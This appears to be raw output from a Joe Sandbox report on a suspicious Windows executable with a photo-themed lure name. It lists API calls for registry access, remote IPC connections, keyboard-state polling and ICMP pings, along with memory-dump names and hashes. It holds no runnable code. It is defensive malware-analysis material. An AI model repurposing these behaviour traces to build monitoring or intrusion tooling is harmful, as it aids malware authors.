                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00D603D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 00D79660
                                                                      • LoadStringW.USER32(00000000,?,00D603D3,?), ref: 00D79663
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D79784
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: c8de0e4eb576610fe33fcfa2714454d2bde03e9922a46f20b410306425db784e
                                                                      • Instruction ID: 16e9d37b780e1869ad5c0d54ebf2204d8906f0fb9b43a89486aad3ffcc3ed496
                                                                      • Opcode Fuzzy Hash: c8de0e4eb576610fe33fcfa2714454d2bde03e9922a46f20b410306425db784e
                                                                      • Instruction Fuzzy Hash: 1E410A72800219BACF04FBE0ED96DEEB778EF55310F140066F50576192EE756E89CAB1
                                                                      APIs
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D7068B
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D706A7
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D706C3
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D706ED
                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D70715
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D70720
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D70725
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: 1add02f5ded55c0e1078009c169a59c1f02632338435a95b8fe3e1d0521db69f
                                                                      • Instruction ID: 6d8074312365f78a404538f315919b3cff946166b72bb9759ef7705ee42ccba5
                                                                      • Opcode Fuzzy Hash: 1add02f5ded55c0e1078009c169a59c1f02632338435a95b8fe3e1d0521db69f
                                                                      • Instruction Fuzzy Hash: F841F872810229FBCF15EBA4EC959EEB778FF54350F04402AE905A22A1EB309E45CF74
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DA3F70
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00DA3F77
                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DA3F8A
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00DA3F92
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DA3F9D
                                                                      • DeleteDC.GDI32(00000000), ref: 00DA3FA7
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00DA3FB1
                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00DA3FC7
                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00DA3FD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                      • String ID: static
                                                                      • API String ID: 2559357485-2160076837
                                                                      • Opcode ID: 1d366064ad20fd9f694a03f3ffc4dbf597b3312760c9c399f848d14aff2a8c16
                                                                      • Instruction ID: 55325f48abe4139a9000cb3cab53ccb05a4eb634e118bdc16975f59dc599bbfd
                                                                      • Opcode Fuzzy Hash: 1d366064ad20fd9f694a03f3ffc4dbf597b3312760c9c399f848d14aff2a8c16
                                                                      • Instruction Fuzzy Hash: 7E316932610219BFDF119FA4DC48FDA3BA9EF0A324F051211FA55E61A0D735D850DBB4
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00D93B83
                                                                      • CoInitialize.OLE32(00000000), ref: 00D93BB1
                                                                      • CoUninitialize.OLE32 ref: 00D93BBB
                                                                      • _wcslen.LIBCMT ref: 00D93C54
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00D93CD8
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D93DFC
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00D93E35
                                                                      • CoGetObject.OLE32(?,00000000,00DAFBB4,?), ref: 00D93E54
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00D93E67
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D93EEB
                                                                      • VariantClear.OLEAUT32(?), ref: 00D93EFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                      • String ID:
                                                                      • API String ID: 429561992-0
                                                                      • Opcode ID: f783d8d60611bd5208b42787e59916abf0a1c37c2cea9667917d1072e5e8c125
                                                                      • Instruction ID: 567e6438ab24809ebb28b64b5c454f516e2d79f0f8ca2f37fc4056a89885e659
                                                                      • Opcode Fuzzy Hash: f783d8d60611bd5208b42787e59916abf0a1c37c2cea9667917d1072e5e8c125
                                                                      • Instruction Fuzzy Hash: E4C14571604305AFCB00DF68C88496BBBE9FF89748F14495DF98A9B211DB31EE05CB62
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00D87A11
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D87AAD
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00D87AC1
                                                                      • CoCreateInstance.OLE32(00DAFD24,00000000,00000001,00DD6E7C,?), ref: 00D87B0D
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D87B92
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00D87BEA
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00D87C75
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D87C98
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00D87C9F
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00D87CF4
                                                                      • CoUninitialize.OLE32 ref: 00D87CFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: feaed1c15cab294dad5dff7097f9d8c28ca02dd563a7fcd9a1331007a54aa7a9
                                                                      • Instruction ID: 7b2c56987148b962bacd2b86853978cc338a62cdc11dd575e2a223aeb3506dc8
                                                                      • Opcode Fuzzy Hash: feaed1c15cab294dad5dff7097f9d8c28ca02dd563a7fcd9a1331007a54aa7a9
                                                                      • Instruction Fuzzy Hash: 58C10B75A00205AFCB14DFA4C884DAEBBF9FF49314B148499E419DB361DB30EE85CBA0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DA5439
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA544A
                                                                      • CharNextW.USER32(00000158), ref: 00DA5479
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DA54BA
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DA54D0
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA54E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: baba90f04a81b3744d48f79828974f5e8e03daf21be4b3cf10baba881a33b79a
                                                                      • Instruction ID: f41d44047065198b9dd65665ed005e7df14a063d0cbc1c6ad1e9771bd49ea42d
                                                                      • Opcode Fuzzy Hash: baba90f04a81b3744d48f79828974f5e8e03daf21be4b3cf10baba881a33b79a
                                                                      • Instruction Fuzzy Hash: AC619C31900609ABDF109F64EC84EFE7BB9EB0B760F184109F925A6294C7B4C941DB70
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D6F998
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00D6F9F1
                                                                      • VariantInit.OLEAUT32(?), ref: 00D6FA03
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D6FA23
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00D6FA76
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D6FA8A
                                                                      • VariantClear.OLEAUT32(?), ref: 00D6FA9F
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00D6FAAC
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D6FAB5
                                                                      • VariantClear.OLEAUT32(?), ref: 00D6FAC7
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D6FAD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 2f68c8f106cd25960ff7f628eca1daa9e65a83bd8be78201a3f1274c4b63f55a
                                                                      • Instruction ID: 851411d5a03150d9a57e8e6ab6b1ba81000b2e552185e8eca86a260fc51911aa
                                                                      • Opcode Fuzzy Hash: 2f68c8f106cd25960ff7f628eca1daa9e65a83bd8be78201a3f1274c4b63f55a
                                                                      • Instruction Fuzzy Hash: 00414D35A10219AFCB00DFA8D8589EDBBB9FF49354F009069E955E7361CB70AA45CFB0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00D79BBF
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00D79C40
                                                                      • GetKeyState.USER32(000000A0), ref: 00D79C5B
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00D79C75
                                                                      • GetKeyState.USER32(000000A1), ref: 00D79C8A
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00D79CA2
                                                                      • GetKeyState.USER32(00000011), ref: 00D79CB4
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00D79CCC
                                                                      • GetKeyState.USER32(00000012), ref: 00D79CDE
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00D79CF6
                                                                      • GetKeyState.USER32(0000005B), ref: 00D79D08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: c05ae9ca92d754776355f5b30acc2dd666d7e47cfa9dd9d2a41f948130b2869c
                                                                      • Instruction ID: a658c96e3bcd3f7a4c37a67bab18a420b280bd30f1bc1b4f201fb2db1f70314f
                                                                      • Opcode Fuzzy Hash: c05ae9ca92d754776355f5b30acc2dd666d7e47cfa9dd9d2a41f948130b2869c
                                                                      • Instruction Fuzzy Hash: F341A6365047CA6DFF32976488643A5FEE1AB12344F0CC05AD6CA566C2FBA499C4C7B2
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00DAD0D0,?,?), ref: 00D74212
                                                                        • Part of subcall function 00D73F58: CharUpperBuffW.USER32(?,?,00000000,00DAD0D0,?,?,00000001,?,?,00D74286,?,?,?,?,00000000,00DAD0D0), ref: 00D73FE5
                                                                      • _wcslen.LIBCMT ref: 00D74296
                                                                      • _wcslen.LIBCMT ref: 00D742F0
                                                                      • _wcslen.LIBCMT ref: 00D74337
                                                                      • _wcslen.LIBCMT ref: 00D7437B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharForegroundUpperWindow
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 1486467469-1994484594
                                                                      • Opcode ID: 232114f937b989509e6bd93f40b4f86bd4a55e987d352a442e8751c58cbcac68
                                                                      • Instruction ID: ccb8bee6db9bc3e2dfca1bea1f81b81ae73c19fc154e31b9aed3d09ee54d9168
                                                                      • Opcode Fuzzy Hash: 232114f937b989509e6bd93f40b4f86bd4a55e987d352a442e8751c58cbcac68
                                                                      • Instruction Fuzzy Hash: A581D132A14702ABC715DF78D89096AB7E1FF55314B54862AF49EC3641FB30E984CBB1
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00D904E3
                                                                      • inet_addr.WSOCK32(?), ref: 00D90543
                                                                      • gethostbyname.WSOCK32(?), ref: 00D9054F
                                                                      • IcmpCreateFile.IPHLPAPI ref: 00D9055D
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D905ED
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D9060C
                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00D906E0
                                                                      • WSACleanup.WSOCK32 ref: 00D906E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: 1720572975bea140408f60d1e13d7817dee9e56517c587678c221f4e3accf3c0
                                                                      • Instruction ID: a3baec7c1eb3b530f163eb1a97792d00b77a57db6cc55048e433f7225ef38cae
                                                                      • Opcode Fuzzy Hash: 1720572975bea140408f60d1e13d7817dee9e56517c587678c221f4e3accf3c0
                                                                      • Instruction Fuzzy Hash: 01915E71608201AFDB20DF15E485B16BFE0EF85328F1985A9E4699B7A2C730ED45CFA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 707087890-567219261
                                                                      • Opcode ID: 02e60956b7f01068a78e5fb84f5f0456123f3fb674bd9fa292876eb6653b22c3
                                                                      • Instruction ID: 4519433a2c4670bae3eba9927cedad3fcdf519b0f4b5270bc7bb07101adc4181
                                                                      • Opcode Fuzzy Hash: 02e60956b7f01068a78e5fb84f5f0456123f3fb674bd9fa292876eb6653b22c3
                                                                      • Instruction Fuzzy Hash: 1C51A031A00116ABCF10DFACC8508BDB7A5EF26724B24422AE866D72C4EF31DD41E7B0
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 00D9369B
                                                                      • CoUninitialize.OLE32 ref: 00D936A6
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00DAFB94,?), ref: 00D93700
                                                                      • IIDFromString.OLE32(?,?), ref: 00D93773
                                                                      • VariantInit.OLEAUT32(?), ref: 00D9380B
                                                                      • VariantClear.OLEAUT32(?), ref: 00D9385D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: beb2be8d3278e534b0eca5789c1d8e35456c534c9cd39d998cef4ea92d9f0ef6
                                                                      • Instruction ID: 52968bfb569340eabe421ae902247b7f9000afafd1500d3566c25f7d33637e5f
                                                                      • Opcode Fuzzy Hash: beb2be8d3278e534b0eca5789c1d8e35456c534c9cd39d998cef4ea92d9f0ef6
                                                                      • Instruction Fuzzy Hash: D961B0B1608301AFC710DF64D889F6ABBE4EF49714F040949F9859B291D770EE48CBB2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 176396367-1994484594
                                                                      • Opcode ID: 32d04afd18879cb06d7ef67cf24c7a4c67863a3fe20db3c0c47e927ba562a5b3
                                                                      • Instruction ID: 0a0088c7014901093cab3e2355246c6632914c77aadeb292894b5c9a825c2046
                                                                      • Opcode Fuzzy Hash: 32d04afd18879cb06d7ef67cf24c7a4c67863a3fe20db3c0c47e927ba562a5b3
                                                                      • Instruction Fuzzy Hash: 13513532B103228BCB268E69C58053B73E1FF95714B68C52DE48D97644FB20DD4587B1
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 00D832ED
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00D8330E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: 926a83d23a46572be6d889f12af5495afa7eb23f20fd3bd269cc25c2e9f28e38
                                                                      • Instruction ID: ee2331b53f082c73a08ebeab311e1e5f30549c413ed038bea38f5ad30a2ed1da
                                                                      • Opcode Fuzzy Hash: 926a83d23a46572be6d889f12af5495afa7eb23f20fd3bd269cc25c2e9f28e38
                                                                      • Instruction Fuzzy Hash: 76515A32900209BACF15EBE0DD42EEEB779EF14700F144066F409A21A1EF756E98CB70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
